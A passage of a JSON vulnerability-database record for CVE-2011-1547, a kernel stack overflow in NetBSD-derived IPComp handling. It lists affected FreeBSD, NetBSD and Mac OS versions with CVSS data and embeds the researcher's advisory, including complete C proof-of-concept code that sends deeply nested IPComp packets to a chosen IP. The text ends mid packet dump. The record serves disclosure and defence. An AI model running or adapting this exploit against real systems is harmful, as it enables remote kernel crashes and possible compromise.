"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.3"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.4x"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.0.x"
},
{
"model": "rc3",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "5.0"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.2"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.7"
},
{
"model": "6.4-release-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.6"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.10"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.10"
},
{
"model": "7.0-release-p3",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.9"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "1.1.5.1"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5.1"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.1"
},
{
"model": "6.4-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5x"
},
{
"model": "-release-p32",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.5"
},
{
"model": "-release-p7",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.8"
},
{
"model": "7.0-release",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.6"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.4"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.2"
},
{
"model": "-release-p20",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.11"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.3"
},
{
"model": "8.1-release",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.1x"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0.x"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.6"
},
{
"model": "rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.2"
},
{
"model": "8.1-prerelease",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.10"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2x"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "1.0"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.10"
},
{
"model": "-prerelease",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.4"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.6"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "-release-p38",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.9"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.8"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "6.0-releng",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "1.1.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.4"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1.6"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.2.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1x"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.11"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.11"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.0.4"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1.7.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.4"
},
{
"model": "beta4",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.0.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.6"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "1.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "-current",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.7"
},
{
"model": "7.2-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "1.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.9"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.4"
},
{
"model": "-stablepre050201",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.8"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.2"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "5.4-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.8"
},
{
"model": "-release-p10",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"model": "current",
"scope": null,
"trust": 0.3,
"vendor": "netbsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.9"
},
{
"model": "-release-p8",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.10"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.2"
},
{
"model": "-release-p17",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.7"
},
{
"model": "7.0-release-p11",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.6"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.1"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.10"
},
{
"model": "-stablepre122300",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.1"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.0"
},
{
"model": "-prerelease",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.8"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.6"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.1.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.4"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "0.41"
},
{
"model": "-prerelease",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.9"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.3"
},
{
"model": "-release-p42",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"model": "6.4-releng",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "6.4-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#668220"
},
{
"db": "BID",
"id": "47123"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1547"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tavis Ormandy",
"sources": [
{
"db": "BID",
"id": "47123"
},
{
"db": "PACKETSTORM",
"id": "99950"
}
],
"trust": 0.4
},
"cve": "CVE-2011-1547",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-1547",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-1547",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#668220",
"trust": 0.8,
"value": "54.77"
},
{
"author": "CNNVD",
"id": "CNNVD-201105-116",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#668220"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers. plural IPComp A memory corruption vulnerability exists in the receive processing of the implementation. IPComp (RFC 3173) Generally IPsec Used with the implementation of KAME Projects and NetBSD In projects, etc. IPComp and IPsec The code that implements the crafted IPComp A stack-based buffer overflow can occur when processing the payload. Attack code using this vulnerability has been released.Service disruption by a remote third party (DoS) An attacker may be able to attack or execute arbitrary code. NetBSD is prone to a remote memory-corruption vulnerability because it fails to adequately check for stack overflows in nested IP Payload Compression protocol (IPComp) payloads. \nAttackers can exploit this issue to trigger a kernel stack overflow, resulting in the execution of arbitrary code with superuser privileges. Failed attacks may cause a denial-of-service condition. A successful exploit will completely compromise affected computers. \nThis issue may affect systems derived from NetBSD IPComp implementations. BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload\n-------------------------------------------------------------------------------\n\nGruezi, this document describes CVE-2011-1547. \n\nRFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to\nprovide compression of ip datagrams, and is commonly used alongside IPSec\n(although there is no requirement to do so). \n\nAn ipcomp datagram consists of an ip header with ip-\u003eip_p set to 108, followed\nby a 32 bit ipcomp header, described in C syntax below. \n\nstruct ipcomp {\n uint8_t comp_nxt; // Next Header\n uint8_t comp_flags; // Reserved\n uint16_t comp_cpi; // Compression Parameter Index\n};\n\nThe Compression Parameter Index indicates which compression algorithm was used\nto compress the ipcomp payload, which is expanded and then routed as requested. \nAlthough the CPI field is 16 bits wide, in reality only 1 algorithm is widely\nimplemented, RFC1951 DEFLATE (cpi=2). \n\nIt\u0027s well documented that ipcomp can be used to traverse perimeter filtering,\nhowever this document discusses potential implementation flaws observed in\npopular stacks. \n\nThe IPComp implementation originating from NetBSD/KAME implements injection of\nunpacked payloads like so:\n\n algo = ipcomp_algorithm_lookup(cpi);\n\n /* ... */\n\n error = (*algo-\u003edecompress)(m, m-\u003em_next, \u0026newlen);\n\n /* ... */\n\n if (nxt != IPPROTO_DONE) {\n if ((inetsw[ip_protox[nxt]].pr_flags \u0026 PR_LASTHDR) != 0 \u0026\u0026\n ipsec4_in_reject(m, NULL)) {\n IPSEC_STATINC(IPSEC_STAT_IN_POLVIO);\n goto fail;\n }\n (*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt);\n } else\n m_freem(m);\n\n /* ... */\n\nWhere inetsw[] contains definitions for supported protocols, and nxt is a\nprotocol number, usually associated with ip-\u003eip_p (see\nhttp://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in\nthis case from ipcomp-\u003ecomp_nxt. m is the mbuf structure adjusted to point to\nthe unpacked payload. \n\nThe unpacked packet is dispatched to the appropriate protocol handler\ndirectly from the ipcomp protocol handler. \n\nThe NetBSD/KAME network stack is used as basis for various other\noperating systems, such as Xnu, FTOS, various embedded devices and\nnetwork appliances, and earlier versions of FreeBSD/OpenBSD (the code\nhas since been refactored, but see the NOTES section regarding IPComp\nquines, which still permit remote, pre-authentication, single-packet,\nspoofed-source DoS in the latest versions). \n\nThe Xnu port of this code is close to the original, where the decompressed\npayload is recursively injected back into the toplevel ip dispatcher. The\nimplementation is otherwise similar, and some alterations to the testcase\nprovided for NetBSD should make it work. This is left as an exercise for the\ninterested reader. \n\n--------------------\nAffected Software\n------------------------\n\nAny NetBSD derived IPComp/IPSec stack may be vulnerable (Xnu, FTOS, etc.). \n\nNetBSD is not distributed with IPSec support enabled by default, however Apple\nOSX and various other derivatives are. There are so many NetBSD derived network\nstacks that it is infeasible to check them all, concerned administrators are\nadvised to check with their vendor if there is any doubt. \n\nMajor vendors known to use network stacks derived from NetBSD were pre-notified\nabout this vulnerability. If I missed you, it is either not well known that you\nuse the BSD stack, you did not respond to security@ mail, or could not use pgp\nproperly. \n\nAdditionally, administrators of critical or major deployments of NetBSD (e.g. \ndns root servers) were given advance notice in order to deploy appropriate\nfilter rules. \n\nExploitability of kernel stack overflows will vary by platform (n.b. a stack\noverflow is not a stack buffer overflow, for a concise definition see\nTAOCP3,V1,S2.2.2). Also note that a kernel stack overflow is very different\nfrom a userland stack overflow. \n\nFor further discussion, including attacks on other operating systems,\nsee the notes section on ipcomp quines below. However, this is not a trivial task, and is highly\nplatform dependent. \n\nI have verified kernel stack overflows on NetBSD are exploitable, I have looked\nat the source code for xnu and do not see any obvious obstacles to prevent\nexploitation (kernel stack segment limits, guard pages, etc. which would cause\nthe worst impact to be limited to remote denial of service), so have no reason\nto believe it is different. \n\nThoughts on this topic from fellow researchers would be welcome. \n\nSource code for a sample Linux program to reproduce this flaw on NetBSD is\nlisted below. Please note, check if your system requires an IPv4 header in the\ncompressed payload before attempting to adapt it to your needs. \n\n#include \u003csys/socket.h\u003e\n#include \u003cnetinet/in.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003carpa/inet.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003czlib.h\u003e\n#include \u003calloca.h\u003e\n#include \u003cstdbool.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n//\n// BSD IPComp Kernel Stack Overflow Testcase\n// -- Tavis Ormandy \u003ctaviso@cmpxchg8b.com\u003e, March 2011\n//\n\n#define MAX_PACKET_SIZE (1024 * 1024 * 32)\n#define MAX_ENCAP_DEPTH 1024\n\nenum {\n IPCOMP_OUI = 1,\n IPCOMP_DEFLATE = 2,\n IPCOMP_LZS = 3,\n IPCOMP_MAX,\n};\n\nstruct ipcomp {\n uint8_t comp_nxt; // Next Header\n uint8_t comp_flags; // Reserved, must be zero\n uint16_t comp_cpi; // Compression parameter index\n uint8_t comp_data[0]; // Payload. \n};\n\nbool ipcomp_encapsulate_data(void *data,\n size_t size,\n int nxt,\n struct ipcomp **out,\n size_t *length,\n int level)\n{\n struct ipcomp *ipcomp;\n z_stream zstream;\n\n ipcomp = malloc(MAX_PACKET_SIZE);\n *out = ipcomp;\n ipcomp-\u003ecomp_nxt = nxt;\n ipcomp-\u003ecomp_cpi = htons(IPCOMP_DEFLATE);\n ipcomp-\u003ecomp_flags = 0;\n\n // Compress packet payload. \n zstream.zalloc = Z_NULL;\n zstream.zfree = Z_NULL;\n zstream.opaque = Z_NULL;\n\n if (deflateInit2(\u0026zstream,\n level,\n Z_DEFLATED,\n -12,\n MAX_MEM_LEVEL,\n Z_DEFAULT_STRATEGY) != Z_OK) {\n fprintf(stderr, \"error: failed to initialize zlib library\\n\");\n return false;\n }\n\n zstream.avail_in = size;\n zstream.next_in = data;\n zstream.avail_out = MAX_PACKET_SIZE - sizeof(struct ipcomp);\n zstream.next_out = ipcomp-\u003ecomp_data;\n\n if (deflate(\u0026zstream, Z_FINISH) != Z_STREAM_END) {\n fprintf(stderr, \"error: deflate() failed to create compressed payload, %s\\n\", zstream.msg);\n return false;\n }\n\n if (deflateEnd(\u0026zstream) != Z_OK) {\n fprintf(stderr, \"error: deflateEnd() returned failure, %s\\n\", zstream.msg);\n return false;\n }\n\n // Calculate size. \n *length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out;\n ipcomp = realloc(ipcomp, *length);\n\n free(data);\n\n return true;\n}\n\nint main(int argc, char **argv)\n{\n int s;\n struct sockaddr_in sin = {0};\n struct ipcomp *ipcomp = malloc(0);\n size_t length = 0;\n unsigned depth = 0;\n\n // Nest an ipcomp packet deeply without compression, this allows us to\n // create maximum redundancy. \n for (depth = 0; depth \u003c MAX_ENCAP_DEPTH; depth++) {\n if (ipcomp_encapsulate_data(ipcomp,\n length,\n IPPROTO_COMP,\n \u0026ipcomp,\n \u0026length,\n Z_NO_COMPRESSION) != true) {\n fprintf(stderr, \"error: failed to encapsulate data\\n\");\n return 1;\n }\n }\n\n // Create a final outer packet with best compression, which should now\n // compress well due to Z_NO_COMPRESSION used in inner payloads. \n if (ipcomp_encapsulate_data(ipcomp,\n length,\n IPPROTO_COMP,\n \u0026ipcomp,\n \u0026length,\n Z_BEST_COMPRESSION) != true) {\n fprintf(stderr, \"error: failed to encapsulate data\\n\");\n return 1;\n }\n\n fprintf(stdout, \"info: created %u nested ipcomp payload, %u bytes\\n\", depth, length);\n\n sin.sin_family = AF_INET;\n sin.sin_port = htons(0);\n sin.sin_addr.s_addr = inet_addr(argv[1]);\n\n if ((s = socket(PF_INET, SOCK_RAW, IPPROTO_COMP)) \u003c 0) {\n fprintf(stderr, \"error: failed to create socket, %m\\n\");\n return 1;\n }\n\n if (sendto(s,\n ipcomp,\n length,\n MSG_NOSIGNAL,\n (const struct sockaddr *)(\u0026sin),\n sizeof(sin)) != length) {\n fprintf(stderr, \"error: send() returned failure, %m\\n\");\n return 1;\n }\n\n fprintf(stdout, \"info: success, packet sent to %s\\n\", argv[1]);\n\n free(ipcomp);\n\n return 0;\n}\n\n\nPackets of the following form are generated. \n\nInternet Protocol, Src: 192.168.1.1, Dst: 192.168.1.2\n Version: 4\n Header length: 20 bytes\n Differentiated Services Field: 0x04 (DSCP 0x01: Unknown DSCP; ECN: 0x00)\n 0000 01.. = Differentiated Services Codepoint: Unknown (0x01)\n .... ..0. = ECN-Capable Transport (ECT): 0\n 